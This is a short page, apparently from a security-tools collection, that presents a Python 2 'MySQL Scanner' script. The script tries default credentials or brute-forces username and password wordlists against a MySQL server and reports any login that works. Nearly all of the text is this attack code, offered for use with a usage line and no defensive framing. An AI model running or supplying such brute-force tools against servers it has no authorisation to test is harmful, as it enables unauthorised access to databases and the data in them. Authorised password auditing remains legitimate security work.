Going up against MySQL
Tools for going against MySQL
MySQL Scanner
Here is a python based scanner to check for default credentials on a MySQL server, or can use supplied wordlist/passwords to bruteforce password.
import MySQLdb import sys user_list = [] pass_list = [] def mysql_connect(u, p, ip): try: print "[+] Attempting Connection..." db = MySQLdb.connect(user = u, passwd = p, host = ip, connect_timeout = 5) print "[+] Connection Successful!\n" print "[+] ----------------------------------------" print "[+] Username: ", u, " Password: ", p print "[+] IP: ", ip print "[+] Server Info: ", db.get_server_info() print "[+] ----------------------------------------" db.close() print "[-] Connection Closed\n" exit(0) except Exception: print "Access denied\n" print u, " | ", p print ip pass # Begin main program print "" print "+--------------------+" print "| MySQL Scanner v1.0 |" print "| Written by Damian |" print "+--------------------+" if(len(sys.argv) == 2): print "[+] Setting up default credentials list\n" user_list = ["admin", "administrator", "root"] pass_list = ["password", "admin", "", "locked"] elif(len(sys.argv) == 4): print "[+] Building word list\n" f = open(sys.argv[2], 'r') for line in f.readlines(): user_list.append(line) f.close print "[+] Building password list\n" f = open(sys.argv[3], 'r') for line in f.readlines(): pass_list.append(line) f.close() else: print "\nUsage:" print "\tsql_scanner.py [host]" print "\tsql_scanner.py [host] [word_list] [password_list]\n" exit(0) ip_address = str(sys.argv[1]) for x in user_list: for y in pass_list: mysql_connect(x, y, ip_address) print "Scan Complete\n"
Submitted by Damian
